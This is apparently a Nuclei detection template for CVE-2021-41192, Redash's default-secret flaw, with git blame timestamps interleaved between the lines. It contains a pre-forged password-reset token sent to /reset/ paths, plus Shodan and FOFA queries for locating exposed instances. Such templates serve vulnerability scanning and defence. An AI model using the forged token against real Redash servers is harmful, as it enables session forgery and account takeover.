2022-02-25 16:17:47 +00:00
id : CVE-2021-41192
info :
2022-03-25 11:45:10 +00:00
name : Redash Setup Configuration - Default Secrets Disclosure
2022-02-25 16:17:47 +00:00
author : bananabr
2022-02-27 10:32:13 +00:00
severity : medium
2022-05-17 09:18:12 +00:00
description : Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.
2023-09-06 12:09:01 +00:00
remediation : |
Remove or update the default secrets in the Redash setup configuration file.
2022-02-25 16:17:47 +00:00
reference :
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
2023-04-12 10:55:48 +00:00
- https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
2022-02-27 10:32:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2022-02-27 10:32:13 +00:00
cve-id : CVE-2021-41192
cwe-id : CWE-1188
2024-05-31 19:23:20 +00:00
epss-score : 0.00807
epss-percentile : 0.81699
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2024-05-23 21:45:20 +00:00
vendor : redash
product : redash
2023-09-06 12:09:01 +00:00
shodan-query : http.favicon.hash:698624197
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=698624197
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,hackerone,redash,auth-bypass
2022-02-25 16:17:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 16:17:47 +00:00
- method : GET
path :
2022-02-25 19:19:01 +00:00
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
2022-02-26 20:57:18 +00:00
2022-02-25 19:10:32 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-02-25 19:10:32 +00:00
matchers-condition : and
matchers :
- type : word
2022-02-26 20:57:18 +00:00
part : body
2022-02-25 19:10:32 +00:00
words :
2022-02-26 20:57:18 +00:00
- "Enter your new password:"
- "redash"
condition : and
2022-02-25 19:10:32 +00:00
- type : status
status :
2022-02-25 19:19:01 +00:00
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100b430161d4f67406d937f021501632a776b165e88766fe5aac19d7543e61cd54602202a8caef664b263d6de002809871fa56a635aaa6b25224efac19f5c6207e96eff:922c64590222798bb761d5b6d8e72950